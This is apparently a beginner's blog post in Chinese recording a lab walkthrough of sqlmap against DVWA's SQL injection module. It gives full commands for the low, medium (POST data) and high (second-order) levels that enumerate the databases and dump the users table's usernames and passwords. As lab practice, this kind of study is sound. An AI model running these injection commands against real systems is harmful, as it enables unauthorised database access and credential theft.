第一次寫博客,目前自己處於一個新手狀態,寫一下博客來記錄一下學習
今天要記錄的是用sqlmap來注入dvwa里的sql注入模塊
先從low等級開始
用sqlmap進行爆破:sqlmap -u "url"
從得到的結果中能看到我們是需要cookie的,然后去dvwa看一下cookie
然后在命令中加入cookie:sqlmap -u "url" --cookie="security=low,PHPSESSID=mtfmtpa2rhgnr887auaudgsm00"
查看數據庫,在后面加上 --dbs就行了
就得到服務器上所有的數據庫,然后簡單的分析一下或者窮舉就能找到我們要爆破的數據庫
然后爆破表:sqlmap -u "url" --cookie="..." -D dvwa --tables
得到數據表
接下來就是爆破列:sqlmap -u "url" --cookie="..." -D dvwa -T users --columns
然后再爆破字段:sqlmap -u "url" --cookie="..." -D dvwa -T users -C user,password --dump
然后就得到了所有的用戶名和密碼
然后是medium
這里的傳輸方式改成了post所以url中沒有參數,我們用burpsuite抓包看一下參數
由於是post傳輸,所以這里要用--data把數據引入過來:sqlmap -u "url" --data="id=1&Submit=Submit(注意大小寫)" --cookie="security=medium;PHPSESSID=...." --dbs
然后接下來的步驟就和上面的一樣了:sqlmap -u "url" --data="id=1&Submit=Submit(注意大小寫)" --cookie="security=medium;PHPSESSID=...." -D dvwa -T users -C user,password --dump
然后是high等級
high等級這里是一個鏈接點擊過后會跳轉到另一個頁面,這個如果用sqlmap進行爆破就要設計到二階sql注入:有些時候注入點輸入的數據看返回結果的時候並不是當前的頁面,而是另外的一個頁面,這時候就需要你指定到哪個頁面獲取響應判斷真假。-–second-order
后面跟一個判斷頁面的URL地址。
首先還是用burpsuite進行抓包查看參數可以發現是與medium是類似的:sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/session-input.php" --data="id=2&Submit=Submit" --cookie="security=high; PHPSESSID=sn535dq4ec4kv2hi50oeltrua9" --second-url "http://localhost/dvwa/vulnerabilities/sqli/" --dbs
然后再與上面的步驟一樣就可以了:sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/session-input.php" --data="id=2&Submit=Submit" --cookie="security=high; PHPSESSID=sn535dq4ec4kv2hi50oeltrua9" --second-url "http://localhost/dvwa/vulnerabilities/sqli/" -D dvwa -T users -C user,password --dump